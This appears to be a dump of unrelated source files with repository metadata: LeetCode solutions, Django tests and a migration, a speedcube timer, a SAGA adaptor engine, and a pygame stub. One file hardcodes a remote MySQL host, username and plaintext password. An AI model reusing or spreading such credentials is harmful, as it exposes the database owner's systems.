url = reverse('customer:customer-detail', kwargs={"pk": 1})
response = self.client.get(url, format='json')
self.assertEqual(response.data["name"], 'customer zarzis')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_customer_update(self):
url = reverse('customer:customer-detail', kwargs={"pk": 1})
data = {
'name':'customer djerba',
'phone': 12342255,
'address': 'rue de la paix'
}
response = self.client.put(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(json.loads(response.content)['name'], 'customer djerba')
|
[
"yassine.jrad@esprit.tn"
] |
yassine.jrad@esprit.tn
|
51e79e81fc843cede5de74dd9720d367ac781088
|
51a37b7108f2f69a1377d98f714711af3c32d0df
|
/src/leetcode/P5337.py
|
6b7387cfd3aeebdde97f2bf7f2058c69a7a07da6
|
[] |
no_license
|
stupidchen/leetcode
|
1dd2683ba4b1c0382e9263547d6c623e4979a806
|
72d172ea25777980a49439042dbc39448fcad73d
|
refs/heads/master
| 2022-03-14T21:15:47.263954
| 2022-02-27T15:33:15
| 2022-02-27T15:33:15
| 55,680,865
| 7
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 692
|
py
|
VOWELS = {
'a': 0,
'e': 1,
'i': 2,
'o': 3,
'u': 4,
}
LV = 5
class Solution:
def findTheLongestSubstring(self, s: str) -> int:
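        # Encode the parity (odd/even count so far) of each vowel as one bit
        # of a 5-bit mask; d maps each mask to the first index where it
        # appeared. The substring (j, i] contains every vowel an even number
        # of times exactly when the mask is equal at j and i, so the answer
        # is the widest such gap.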
d = {0: -1}
n = len(s)
r, t = 0, 0
for i in range(n):
if s[i] in VOWELS:
t ^= 1 << (VOWELS[s[i]])
if t in d:
r = max(r, i - d[t])
else:
d[t] = i
return r
# For test only
SI = (("eleetminicoworoep", ),
("leetcodeisgreat", ),
("bcbcbc", ),
)
SO = (13, 5, 6)
TM = 'findTheLongestSubstring'
if __name__ == '__main__':
from leetcode.PTester import PTester
PTester(SI, SO, Solution, TM).run()
|
[
"stupidchen@foxmail.com"
] |
stupidchen@foxmail.com
|
bd71e8834041355af9994538d8b413ecfd3d17bf
|
747f759311d404af31c0f80029e88098193f6269
|
/addons/invoice_department/__openerp__.py
|
afc156863ffd05e1b0be166b0b4bd23ce538647e
|
[] |
no_license
|
sgeerish/sirr_production
|
9b0d0f7804a928c0c582ddb4ccb7fcc084469a18
|
1081f3a5ff8864a31b2dcd89406fac076a908e78
|
refs/heads/master
| 2020-05-19T07:21:37.047958
| 2013-09-15T13:03:36
| 2013-09-15T13:03:36
| 9,648,444
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 71
|
py
|
/home/openerp/production/extra-addons/invoice_department/__openerp__.py
|
[
"geerish@omerp.net"
] |
geerish@omerp.net
|
4444e9fdf7a521fb5b97b051d6c60e7eb88cedff
|
20674c17d815214bf66b75be686bb8a45c0f5914
|
/version1/41_First_Missing_Positive.py
|
46f175341cad376abe13c15b0427afd35607a259
|
[] |
no_license
|
moontree/leetcode
|
e7b670969fe20785b15aae82996875fd66de1b08
|
f2bf9b13508cd01c8f383789569e55a438f77202
|
refs/heads/master
| 2021-05-20T20:36:45.615420
| 2020-04-02T09:15:26
| 2020-04-02T09:15:26
| 252,408,563
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,159
|
py
|
'''
Given an unsorted integer array, find the first missing positive integer.
For example,
Given [1,2,0] return 3,
and [3,4,-1,1] return 2.
Your algorithm should run in O(n) time and uses constant space.
'''
examples = [
{
"nums" : [1, 2, -1],
"res" : 3
},
{
"nums": [3, 4, -1, 1],
"res" : 2
},
{
"nums": [3, 4, 2, 1],
"res" : 5
},
{
"nums": [-1, -2, -3, 0],
"res" : 1
},
{
"nums": [0, 2, -1, 1],
"res" : 3
},{
'nums': [2],
"res" : 1
},{
'nums': [1, 1],
"res" : 2
},{
'nums': [4, 5],
"res" : 1
},{
'nums': [0, -1, 3, 1],
"res" : 2
}
]
def firstMissingPositive(nums):
"""
:type nums: List[int]
:rtype: int
"""
nums.append(-1)
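    # Cyclic placement: nums[index] is repeatedly swapped toward its home
    # slot (value v belongs at index v); out-of-range values are zeroed,
    # and duplicates already in place are left alone.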
index = 0
count = len(nums) - 1
while index < count:
if nums[index] == index:
index += 1
else:
while nums[index] != index:
if nums[index] < 1 or nums[index] > count:
nums[index] = 0
break
else:
tmp = nums[index]
if nums[tmp] == tmp:
break
nums[index] = nums[tmp]
nums[tmp] = tmp
index += 1
for i in range(1, count + 1):
if nums[i] != i:
return i
return count + 1
'''
Second approach (note: this definition shadows the one above):
clamp every out-of-range value into [0, n), then mark each present value v
by adding n at index v % n; any index i >= 1 whose value stays below n was
never marked, so i is the first missing positive.
'''
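# Worked example of the marking idea (illustrative, not part of the original
# file): nums = [3, 4, -1, 1] -> append 0, so n = 5; clamping out-of-range
# values gives [3, 4, 0, 1, 0]; adding n at index (v % n) marks indices
# 3, 4, 0 and 1; index 2 is never marked (stays < n), so the answer is 2.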
def firstMissingPositive(nums):
"""
:type nums: List[int]
:rtype: int
"""
nums.append(0)
n = len(nums)
for i in range(len(nums)):
if nums[i] < 0 or nums[i] >= n:
nums[i] = 0
for i in range(len(nums)):
nums[nums[i] % n] += n
for i in range(1, len(nums)):
if nums[i] < n:
return i
return n
for example in examples:
print '--- test cases ---'
print example
res = firstMissingPositive(example['nums'])
print res == example['res'], res, example['res']
|
[
"zhangchao@zhangchaodeMacBook-Pro.local"
] |
zhangchao@zhangchaodeMacBook-Pro.local
|
65dbaa98b62745d99f56f451abb321eeee0493ad
|
e23a4f57ce5474d468258e5e63b9e23fb6011188
|
/125_algorithms/_exercises/templates/_algorithms_challenges/leetcode/LeetcodePythonProject_with_solution/leetcode_0751_0800/LeetCode799_ChampagneTower.py
|
0aa3fdd38948e8a2234d58be1d63778409f91a00
|
[] |
no_license
|
syurskyi/Python_Topics
|
52851ecce000cb751a3b986408efe32f0b4c0835
|
be331826b490b73f0a176e6abed86ef68ff2dd2b
|
refs/heads/master
| 2023-06-08T19:29:16.214395
| 2023-05-29T17:09:11
| 2023-05-29T17:09:11
| 220,583,118
| 3
| 2
| null | 2023-02-16T03:08:10
| 2019-11-09T02:58:47
|
Python
|
UTF-8
|
Python
| false
| false
| 1,206
|
py
|
'''
Created on Apr 18, 2018
@author: tongq
'''
class Solution(object):
    def champagneTower(self, poured, query_row, query_glass):
        """
        :type poured: int
        :type query_row: int
        :type query_glass: int
        :rtype: float
        """
        # Simulate the tower row by row: any glass holding more than one
        # unit spills the excess equally into the two glasses below it.
        result = [[0.0] * 101 for _ in range(101)]
        result[0][0] = poured
        for i in range(100):
            for j in range(i + 1):
                if result[i][j] >= 1:
                    result[i + 1][j] += (result[i][j] - 1) / 2.0
                    result[i + 1][j + 1] += (result[i][j] - 1) / 2.0
                    result[i][j] = 1.0
        return result[query_row][query_glass]

    def test(self):
        testCases = [
            [1, 1, 1],  # 0.0
            [2, 1, 1],  # 0.5
            [2, 1, 0],  # 0.5
            [6, 2, 0],
            [6, 2, 1],
            [6, 3, 1],
            [6, 3, 0],
        ]
        for poured, query_row, query_glass in testCases:
            print('poured: %s' % poured)
            print('query_row: %s' % query_row)
            print('query_glass: %s' % query_glass)
            result = self.champagneTower(poured, query_row, query_glass)
            print('result: %s' % result)
            print('-=' * 30 + '-')


if __name__ == '__main__':
    Solution().test()
|
[
"sergejyurskyj@yahoo.com"
] |
sergejyurskyj@yahoo.com
|
8aade5817b19ff2fa35eb58b3c891b4d8f7781e4
|
7212600f89c640bd4a936934f8bed985acd3e2d5
|
/cgi-bin/filewriter.py
|
8a16b35e0c58429ddeda1e08a01605d0c3b1cbf8
|
[] |
no_license
|
SkyPromp/Speedcube-timer
|
3bac6b242886654168919f2ca351b858e4c5dd1f
|
41c5859844e73aced035f626df5dc71a388b1ade
|
refs/heads/main
| 2023-06-04T04:44:34.095363
| 2021-06-27T19:58:16
| 2021-06-27T19:58:16
| 378,777,146
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 677
|
py
|
import datetime
# Append the current date/time, scramble and solving time to the text file
def write(scramble, time):
file = open("times.csv", "a")
file.write(f"{datetime.datetime.now()},{scramble},{time}\n")
file.close()
# Remove the last recorded solve: drop the trailing empty line and the last
# used line, then restore the final newline.
def remove():
    with open("times.csv", "r") as file:
        r = file.read()
    m = r.split("\n")
    s = "\n".join(m[:-2]) + "\n"  # remove last 2 lines (last line is empty)
    if len(s) == 1:  # only the bare newline is left, so clear the file
        s = ""
    with open("times.csv", "w+") as file:
        file.write(s)
|
[
"max.poppe@ugent.be"
] |
max.poppe@ugent.be
|
ba527a5399515881d5b2223c59c62dcee6f8eaed
|
e5ac5f718df4c3c90c02a6275b9e690dffceeaa5
|
/saga/engine/engine.py
|
49f323a398538036945e9849e77d19d1bb641ae3
|
[
"Apache-2.0"
] |
permissive
|
virthead/COMPASS-pilot
|
5cbd83b542d3c1a5ba078c6ac19f133093c86383
|
131fa454de3b5378622c6a176930cfc5b3e58267
|
refs/heads/master
| 2020-03-26T08:14:06.068259
| 2018-12-04T11:24:42
| 2018-12-04T11:24:42
| 144,692,491
| 0
| 1
|
Apache-2.0
| 2018-11-13T08:43:43
| 2018-08-14T08:37:45
|
Python
|
UTF-8
|
Python
| false
| false
| 24,143
|
py
|
__author__ = "Andre Merzky, Ole Weidner"
__copyright__ = "Copyright 2012-2013, The SAGA Project"
__license__ = "MIT"
""" Provides the SAGA runtime. """
import re
import sys
import pprint
import string
import inspect
import radical.utils as ru
import radical.utils.config as ruc
import radical.utils.logger as rul
import saga.exceptions as se
import saga.engine.registry # adaptors to load
############# These are all supported options for saga.engine ####################
##
_config_options = [
{
'category' : 'saga.engine',
'name' : 'load_beta_adaptors',
'type' : bool,
'default' : False,
'valid_options' : [True, False],
'documentation' : 'load adaptors which are marked as beta (i.e. not released).',
'env_variable' : None
},
# FIXME: is there a better place to register util level options?
{
'category' : 'saga.utils.pty',
'name' : 'prompt_pattern',
'type' : str,
'default' : '[\$#%>\]]\s*$',
'documentation' : 'use this regex to detect shell prompts',
'env_variable' : None
},
{
'category' : 'saga.utils.pty',
'name' : 'ssh_copy_mode',
'type' : str,
'default' : 'sftp',
'valid_options' : ['sftp', 'scp', 'rsync+ssh', 'rsync'],
'documentation' : 'use the specified protocol for pty level file transfer',
'env_variable' : 'SAGA_PTY_SSH_COPYMODE'
},
{
'category' : 'saga.utils.pty',
'name' : 'connection_pool_ttl',
'type' : int,
'default' : 10*60,
'documentation' : 'minimum time a connection is kept alive in a connection pool',
'env_variable' : 'SAGA_PTY_CONN_POOL_TTL'
},
{
'category' : 'saga.utils.pty',
'name' : 'connection_pool_size',
'type' : int,
'default' : 10,
'documentation' : 'maximum number of connections kept in a connection pool',
'env_variable' : 'SAGA_PTY_CONN_POOL_SIZE'
},
{
'category' : 'saga.utils.pty',
'name' : 'connection_pool_wait',
'type' : int,
'default' : 10*60,
'documentation' : 'maximum number of seconds to wait for any connection in the connection pool to become available before raising a timeout error',
'env_variable' : 'SAGA_PTY_CONN_POOL_WAIT'
}
]
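# Illustrative usage (a sketch, not part of the original module): an option
# defined above is read through its category config, as the Engine does in
# its constructor:
#
#     cfg = self.get_config ('saga.engine')
#     load_beta = cfg['load_beta_adaptors'].get_value ()
#
# Options that declare an 'env_variable' (e.g. SAGA_PTY_SSH_COPYMODE) are
# presumably also settable from the environment.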
################################################################################
##
class Engine(ruc.Configurable):
""" Represents the SAGA engine runtime system.
The Engine is a singleton class that takes care of adaptor
loading and management, and which binds adaptor instances to
API object instances. The Engine singleton is implicitly
instantiated as soon as SAGA is imported into Python. It
will, on creation, load all available adaptors. Adaptors
modules MUST provide an 'Adaptor' class, which will register
the adaptor in the engine with information like these
(simplified)::
_ADAPTOR_INFO = {
'name' : _adaptor_name,
'version' : 'v1.3'
'schemas' : ['fork', 'local']
'cpis' : [{
'type' : 'saga.job.Job',
'class' : 'LocalJob',
},
{
'type' : 'saga.job.Service',
'class' : 'LocalJobService',
}
]
}
where 'class' points to the actual adaptor classes, and
'schemas' lists the URL schemas for which those adaptor
classes should be considered. Note that schemas are case
insensitive. More details on the adaptor registration process
and on adaptor meta data can be found in the adaptors writer
guide.
:todo: add link to adaptor writers documentation.
While loading adaptors, the Engine builds up an internal
registry of adaptor classes, hierarchically sorted like this
(simplified)::
_adaptor_registry =
{
'job' :
{
'gram' : [<gram job adaptor, gram job adaptor class>]
'ssh' : [<ssh job adaptor, ssh job adaptor class>]
'http' : [<aws job adaptor, aws job adaptor class>,
<occi job adaptor, occi job adaptor class>]
...
},
'file' :
{
'ftp' : <ftp file adaptor, ftp file adaptor class>
'scp' : <scp file adaptor, scp file adaptor class>
...
},
...
}
to enable simple lookup operations when binding an API object
to an adaptor class instance. For example, a
'saga.job.Service('http://remote.host.net/')' constructor
would use (simplified)::
            def __init__ (self, url="", session=None) :
                for (adaptor, adaptor_class) in self._engine._adaptor_registry['job'][url.scheme] :
                    try :
                        self._adaptor = adaptor_class (self, url, session)
                    except saga.Exception as e :
                        # adaptor bailed out
                        continue
                    else :
                        # successfully bound to adaptor
                        return
"""
__metaclass__ = ru.Singleton
#-----------------------------------------------------------------
#
def __init__(self):
# Engine manages cpis from adaptors
self._adaptor_registry = {}
# set the configuration options for this object
ruc.Configurable.__init__ (self, 'saga')
ruc.Configurable.config_options (self, 'saga.engine', _config_options)
self._cfg = self.get_config('saga.engine')
# Initialize the logging, and log version (this is a singleton!)
self._logger = rul.getLogger ('saga', 'Engine')
# load adaptors
self._load_adaptors ()
#-----------------------------------------------------------------
#
def _load_adaptors (self, inject_registry=None):
""" Try to load all adaptors that are registered in
saga.engine.registry.py. This method is called from the
constructor. As Engine is a singleton, this method is
called once after the module is first loaded in any python
application.
:param inject_registry: Inject a fake registry. *For unit tests only*.
"""
# get the engine config options
global_config = ruc.getConfig('saga')
# get the list of adaptors to load
registry = saga.engine.registry.adaptor_registry
# check if some unit test wants to use a special registry. If
# so, we reset cpi infos from the earlier singleton creation.
if inject_registry != None :
self._adaptor_registry = {}
registry = inject_registry
# attempt to load all registered modules
for module_name in registry:
self._logger.info ("Loading adaptor %s" % module_name)
# first, import the module
adaptor_module = None
try :
adaptor_module = __import__ (module_name, fromlist=['Adaptor'])
except Exception as e:
self._logger.warn ("Skipping adaptor %s 1: module loading failed: %s" % (module_name, e))
continue # skip to next adaptor
# we expect the module to have an 'Adaptor' class
# implemented, which, on calling 'register()', returns
# a info dict for all implemented adaptor classes.
adaptor_instance = None
adaptor_info = None
try:
adaptor_instance = adaptor_module.Adaptor ()
adaptor_info = adaptor_instance.register ()
except se.SagaException as e:
self._logger.warn ("Skipping adaptor %s: loading failed: '%s'" % (module_name, e))
continue # skip to next adaptor
except Exception as e:
self._logger.warn ("Skipping adaptor %s: loading failed: '%s'" % (module_name, e))
continue # skip to next adaptor
            # the adaptor must also provide a sanity_check() method, which should
# be used to confirm that the adaptor can function properly in the
# current runtime environment (e.g., that all pre-requisites and
# system dependencies are met).
try:
adaptor_instance.sanity_check ()
except Exception as e:
self._logger.warn ("Skipping adaptor %s: failed self test: %s" % (module_name, e))
continue # skip to next adaptor
# check if we have a valid adaptor_info
if adaptor_info is None :
self._logger.warning ("Skipping adaptor %s: adaptor meta data are invalid" \
% module_name)
continue # skip to next adaptor
if not 'name' in adaptor_info or \
not 'cpis' in adaptor_info or \
not 'version' in adaptor_info or \
not 'schemas' in adaptor_info :
self._logger.warning ("Skipping adaptor %s: adaptor meta data are incomplete" \
% module_name)
continue # skip to next adaptor
adaptor_name = adaptor_info['name']
adaptor_version = adaptor_info['version']
adaptor_schemas = adaptor_info['schemas']
            adaptor_enabled = True   # default unless disabled by 'enabled' option or version filter
# disable adaptors in 'alpha' or 'beta' versions -- unless
# the 'load_beta_adaptors' config option is set to True
if not self._cfg['load_beta_adaptors'].get_value () :
if 'alpha' in adaptor_version.lower() or \
'beta' in adaptor_version.lower() :
self._logger.warn ("Skipping adaptor %s: beta versions are disabled (%s)" \
% (module_name, adaptor_version))
continue # skip to next adaptor
            # get the 'enabled' option in the adaptor's config
            # section (saga.cpi.base ensures that the option exists,
            # if it is initialized correctly in the adaptor class).
adaptor_config = None
adaptor_enabled = False
try :
adaptor_config = global_config.get_category (adaptor_name)
adaptor_enabled = adaptor_config['enabled'].get_value ()
except se.SagaException as e:
self._logger.warn ("Skipping adaptor %s: initialization failed: %s" % (module_name, e))
continue # skip to next adaptor
except Exception as e:
self._logger.warn ("Skipping adaptor %s: initialization failed: %s" % (module_name, e))
continue # skip to next adaptor
# only load adaptor if it is not disabled via config files
if adaptor_enabled == False :
self._logger.info ("Skipping adaptor %s: 'enabled' set to False" \
% (module_name))
continue # skip to next adaptor
# check if the adaptor has anything to register
if 0 == len (adaptor_info['cpis']) :
self._logger.warn ("Skipping adaptor %s: does not register any cpis" \
% (module_name))
continue # skip to next adaptor
# we got an enabled adaptor with valid info - yay! We can
# now register all adaptor classes (cpi implementations).
for cpi_info in adaptor_info['cpis'] :
# check cpi information details for completeness
if not 'type' in cpi_info or \
not 'class' in cpi_info :
self._logger.info ("Skipping adaptor %s cpi: cpi info detail is incomplete" \
% (module_name))
continue # skip to next cpi info
# adaptor classes are registered for specific API types.
cpi_type = cpi_info['type']
cpi_cname = cpi_info['class']
cpi_class = None
try :
cpi_class = getattr (adaptor_module, cpi_cname)
except Exception as e:
# this exception likely means that the adaptor does
# not call the saga.adaptors.Base initializer (correctly)
self._logger.warning ("Skipping adaptor %s: adaptor class invalid %s: %s" \
% (module_name, cpi_info['class'], str(e)))
continue # skip to next adaptor
# make sure the cpi class is a valid cpi for the given type.
# We walk through the list of known modules, and try to find
# a modules which could have that class. We do the following
# tests:
#
# cpi_class: ShellJobService
# cpi_type: saga.job.Service
# modules: saga.adaptors.cpi.job
# modules: saga.adaptors.cpi.job.service
# classes: saga.adaptors.cpi.job.Service
# classes: saga.adaptors.cpi.job.service.Service
#
# cpi_class: X509Context
# cpi_type: saga.Context
# modules: saga.adaptors.cpi.context
# classes: saga.adaptors.cpi.context.Context
#
# So, we add a 'adaptors.cpi' after the 'saga' namespace
# element, then append the rest of the given namespace. If that
# gives a module which has the requested class, fine -- if not,
# we add a lower cased version of the class name as last
# namespace element, and check again.
# -> saga . job . Service
# <- ['saga', 'job', 'Service']
cpi_type_nselems = cpi_type.split ('.')
if len(cpi_type_nselems) < 2 or \
len(cpi_type_nselems) > 3 :
self._logger.warn ("Skipping adaptor %s: cpi type not valid: '%s'" \
% (module_name, cpi_type))
continue # skip to next cpi info
if cpi_type_nselems[0] != 'saga' :
self._logger.warn ("Skipping adaptor %s: cpi namespace not valid: '%s'" \
% (module_name, cpi_type))
continue # skip to next cpi info
# -> ['saga', 'job', 'Service']
# <- ['saga', 'adaptors', 'cpi', 'job', 'Service']
cpi_type_nselems.insert (1, 'adaptors')
cpi_type_nselems.insert (2, 'cpi')
# -> ['saga', 'adaptors', 'cpi', 'job', 'Service']
# <- ['saga', 'adaptors', 'cpi', 'job'], 'Service'
cpi_type_cname = cpi_type_nselems.pop ()
# -> ['saga', 'adaptors', 'cpi', 'job'], 'Service'
# <- 'saga.adaptors.cpi.job
# <- 'saga.adaptors.cpi.job.service
cpi_type_modname_1 = '.'.join (cpi_type_nselems)
cpi_type_modname_2 = '.'.join (cpi_type_nselems + [cpi_type_cname.lower()])
# does either module exist?
cpi_type_modname = None
if cpi_type_modname_1 in sys.modules :
cpi_type_modname = cpi_type_modname_1
if cpi_type_modname_2 in sys.modules :
cpi_type_modname = cpi_type_modname_2
if not cpi_type_modname :
self._logger.warn ("Skipping adaptor %s: cpi type not known: '%s'" \
% (module_name, cpi_type))
continue # skip to next cpi info
# so, make sure the given cpi is actually
# implemented by the adaptor class
cpi_ok = False
for name, cpi_obj in inspect.getmembers (sys.modules[cpi_type_modname]) :
if name == cpi_type_cname and \
inspect.isclass (cpi_obj) :
if issubclass (cpi_class, cpi_obj) :
cpi_ok = True
if not cpi_ok :
self._logger.warn ("Skipping adaptor %s: doesn't implement cpi '%s (%s)'" \
% (module_name, cpi_class, cpi_type))
continue # skip to next cpi info
# finally, register the cpi for all its schemas!
registered_schemas = list()
for adaptor_schema in adaptor_schemas:
adaptor_schema = adaptor_schema.lower ()
# make sure we can register that cpi type
if not cpi_type in self._adaptor_registry :
self._adaptor_registry[cpi_type] = {}
# make sure we can register that schema
if not adaptor_schema in self._adaptor_registry[cpi_type] :
self._adaptor_registry[cpi_type][adaptor_schema] = []
# we register the cpi class, so that we can create
# instances as needed, and the adaptor instance,
# as that is passed to the cpi class c'tor later
# on (the adaptor instance is used to share state
# between cpi instances, amongst others)
info = {'cpi_cname' : cpi_cname,
'cpi_class' : cpi_class,
'adaptor_name' : adaptor_name,
'adaptor_instance' : adaptor_instance}
# make sure this tuple was not registered, yet
if info in self._adaptor_registry[cpi_type][adaptor_schema] :
self._logger.warn ("Skipping adaptor %s: already registered '%s - %s'" \
% (module_name, cpi_class, adaptor_instance))
continue # skip to next cpi info
self._adaptor_registry[cpi_type][adaptor_schema].append(info)
registered_schemas.append(str("%s://" % adaptor_schema))
self._logger.info("Register adaptor %s for %s API with URL scheme(s) %s" %
(module_name,
cpi_type,
registered_schemas))
#-----------------------------------------------------------------
#
def find_adaptors (self, ctype, schema) :
        ''' Look for a suitable cpi class serving a particular schema
            This method will sift through our adaptor registry (see
            '_load_adaptors()') and dig for any adaptor which matches the given
            api class type and schema.  All matching adaptors are returned (by
            name).
        '''
if not ctype in self._adaptor_registry :
return []
if not schema.lower () in self._adaptor_registry[ctype] :
return []
adaptor_names = []
for info in self._adaptor_registry[ctype][schema.lower ()] :
adaptor_names.append (info['adaptor_name'])
return adaptor_names
#-----------------------------------------------------------------
#
def get_adaptor (self, adaptor_name) :
''' Return the adaptor module's ``Adaptor`` class for the given adaptor
name.
This method is used if adaptor or API object implementation need to
interact with other adaptors.
'''
for ctype in self._adaptor_registry.keys () :
for schema in self._adaptor_registry[ctype].keys () :
for info in self._adaptor_registry[ctype][schema] :
if ( info['adaptor_name'] == adaptor_name ) :
return info['adaptor_instance']
error_msg = "No adaptor named '%s' found" % adaptor_name
self._logger.error(error_msg)
raise se.NoSuccess(error_msg)
#-----------------------------------------------------------------
#
def bind_adaptor (self, api_instance, ctype, schema,
preferred_adaptor, *args, **kwargs) :
'''
Look for a suitable adaptor class to bind to, instantiate it, and
initialize it.
If 'preferred_adaptor' is not 'None', only that given adaptors is
considered, and adaptor classes are only created from that specific
adaptor.
'''
if not ctype in self._adaptor_registry:
error_msg = "No adaptor found for '%s' and URL scheme %s://" \
% (ctype, schema)
self._logger.error(error_msg)
raise se.NotImplemented(error_msg)
if not schema in self._adaptor_registry[ctype]:
error_msg = "No adaptor found for '%s' and URL scheme %s://" \
% (ctype, schema)
self._logger.error(error_msg)
raise se.NotImplemented(error_msg)
# cycle through all applicable adaptors, and try to instantiate
# a matching one.
exception = saga.NoSuccess ("binding adaptor failed", api_instance)
for info in self._adaptor_registry[ctype][schema] :
cpi_cname = info['cpi_cname']
cpi_class = info['cpi_class']
adaptor_name = info['adaptor_name']
adaptor_instance = info['adaptor_instance']
try :
# is this adaptor acceptable?
if preferred_adaptor != None and \
preferred_adaptor != adaptor_instance :
# ignore this adaptor
self._logger.debug ("bind_adaptor for %s : %s != %s - ignore adaptor" \
% (cpi_cname, preferred_adaptor, adaptor_instance))
continue
# instantiate cpi
cpi_instance = cpi_class (api_instance, adaptor_instance)
# self._logger.debug("Successfully bound %s.%s to %s" \
# % (adaptor_name, cpi_cname, api_instance))
return cpi_instance
except se.SagaException as e :
# adaptor class initialization failed - try next one
exception._add_exception (e)
self._logger.info ("bind_adaptor adaptor class ctor failed : %s.%s: %s" \
% (adaptor_name, cpi_class, str(e)))
continue
except Exception as e :
exception._add_exception (saga.NoSuccess (str(e), api_instance))
self._logger.info ("bind_adaptor adaptor class ctor failed : %s.%s: %s" \
% (adaptor_name, cpi_class, str(e)))
continue
self._logger.error ("No suitable adaptor found for '%s' and URL scheme '%s'" % (ctype, schema))
self._logger.info ("%s" % (str(exception)))
raise exception._get_exception_stack ()
#-----------------------------------------------------------------
#
def loaded_adaptors (self):
return self._adaptor_registry
#-----------------------------------------------------------------
#
def _dump (self) :
import pprint
pprint.pprint (self._adaptor_registry)
|
[
"virthead@pandawms.jinr.ru"
] |
virthead@pandawms.jinr.ru
|
0790885d07748510ba3469b18c3485786ca2c678
|
c0d489046bc114672139873916a118a203c6f850
|
/Medium/93. Restore IP Addresses.py
|
94ed17c1daab3e46ce78aa9e4f44a4152abf96d2
|
[] |
no_license
|
shifty049/LeetCode_Practice
|
165ada14a8fd436e9068bd94d6b82b1ed312013c
|
ca8be179282be86450c9959fb239466d152a55e5
|
refs/heads/master
| 2022-05-25T16:23:05.736852
| 2022-03-29T13:48:21
| 2022-03-29T13:48:21
| 249,737,622
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,024
|
py
|
class Solution:
def restoreIpAddresses(self, s: str) -> List[str]:
lst = []
length = len(s)
def backtracking(num, count, sub_lst):
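            # sub_lst records the cut positions chosen so far (starting at 0);
            # the check below rejects the most recent segment if it exceeds
            # 255 or has a leading zero.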
if len(sub_lst)>1 and (int(s[sub_lst[-2]:sub_lst[-1]]) > 255 or (s[sub_lst[-2]] == '0' and len(s[sub_lst[-2]:sub_lst[-1]])>1)):
return
if num >= length or count >= 4:
if count == 4 and num==length:
if sub_lst not in lst:
lst.append('.'.join([s[i:sub_lst[ix+1]] for ix,i in enumerate(sub_lst[:-1])]))
return
for i in range(1, length - num - 2 + count ):
backtracking(num+i, count+1, sub_lst+[sub_lst[-1]+i])
backtracking(0 , 0, [0])
return lst
#Runtime: 148 ms, faster than 8.99% of Python3 online submissions for Restore IP Addresses.
#Memory Usage: 14.4 MB, less than 7.55% of Python3 online submissions for Restore IP Addresses.
#Fu-Ti, Hsu
#shifty049@gmail.com
|
[
"shifty049@gmail.com"
] |
shifty049@gmail.com
|
152a39c5f6f25998206bbb4444fc935c598143eb
|
561513a9927f351720616f7a66556e2bdcb89346
|
/request.py
|
28fadfb2b460f81b686694fc330d9a2acece2186
|
[] |
no_license
|
CNllb/Hokkien_DataBases
|
511544abdff94ada1813f4ee6299034e6368cfd3
|
021df946f5441538d53d7170240dd281b9ac86ba
|
refs/heads/main
| 2023-09-05T22:15:09.793737
| 2021-11-24T10:30:41
| 2021-11-24T10:30:41
| 425,679,947
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 439
|
py
|
import pymysql
def link_to_database():
conn = pymysql.connect(
host="gz-cynosdbmysql-grp-56sj4bjz.sql.tencentcdb.com",
user="root",
port=25438,
password="Lcx010327",
database="Hokkien");
    # create a cursor
    cursor = conn.cursor()
    sql = ""
    try:
        cursor.execute(sql)
        cursor.close()
        conn.close()
    except Exception:
        print("Error: unable to execute the query")
|
[
"1360602885@qq.com"
] |
1360602885@qq.com
|
9b45c38f51e416a27227fa1c503c2124840c9bfa
|
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
|
/ZeeWN5NdFa8ALJq5G_16.py
|
003fc3b30954c00178f5a2acaa2c8646fd3bff48
|
[] |
no_license
|
daniel-reich/ubiquitous-fiesta
|
26e80f0082f8589e51d359ce7953117a3da7d38c
|
9af2700dbe59284f5697e612491499841a6c126f
|
refs/heads/master
| 2023-04-05T06:40:37.328213
| 2021-04-06T20:17:44
| 2021-04-06T20:17:44
| 355,318,759
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 154
|
py
|
def nearest_chapter(ch, p):
    # Sort by page number (descending) first so that, after the stable sort
    # by distance to p, ties resolve to the chapter with the larger page.
    out = sorted(ch.keys(), key=lambda x: ch[x], reverse=True)
    out.sort(key=lambda x: abs(ch[x] - p))
    return out[0]
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
95de42864a1816e62e897dbcecdc4d73c21b66c6
|
f8ae676c657638dac835c437a443767431de2d60
|
/News/migrations/0009_alter_news_text.py
|
4f54d36fb68bacd4c52082e396d4cc11788fcbd6
|
[] |
no_license
|
OR6107/150th-kaiseifes-backend
|
0dc03b1c91b86b2333100d0ea5097654e26409a8
|
9b9429443a834c5dd78a3904ad52ee03e73f4fac
|
refs/heads/main
| 2023-06-17T14:09:42.315863
| 2021-07-18T03:52:10
| 2021-07-18T03:52:10
| 378,079,752
| 0
| 0
| null | 2021-06-18T08:09:02
| 2021-06-18T08:09:02
| null |
UTF-8
|
Python
| false
| false
| 363
|
py
|
# Generated by Django 3.2.4 on 2021-07-02 10:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('News', '0008_alter_news_text'),
]
operations = [
migrations.AlterField(
model_name='news',
name='text',
field=models.TextField(),
),
]
|
[
"keigo0827511@gmail.com"
] |
keigo0827511@gmail.com
|
a9233691883537261c42a589490d45807bd1e36c
|
8d63c58eae36070409f05192a2f2366092cfb482
|
/game_util.py
|
64734893a08a661f036e0a145c6e944bee27f4e6
|
[
"MIT"
] |
permissive
|
Quazyrog/kopernik-python
|
f8d97bfddcbff97a367e0af808d6fffb0092fce6
|
202fdd5d0321960904d473d986c172e56dd62a03
|
refs/heads/master
| 2020-08-02T06:21:15.172240
| 2019-09-27T12:23:33
| 2019-09-27T12:23:33
| 211,261,190
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,625
|
py
|
import pygame
import pytmx
from pygame.sprite import Group, Sprite, spritecollideany
from pygame.math import Vector2
from pytmx import TiledTileLayer, TiledObject
SCREEN_SIZE = (1366, 768)
ASSETS_DIR = "./Assets"
class Game:
def __init__(self):
self.running = False
self.screen = None
self.player = None
self.level = None
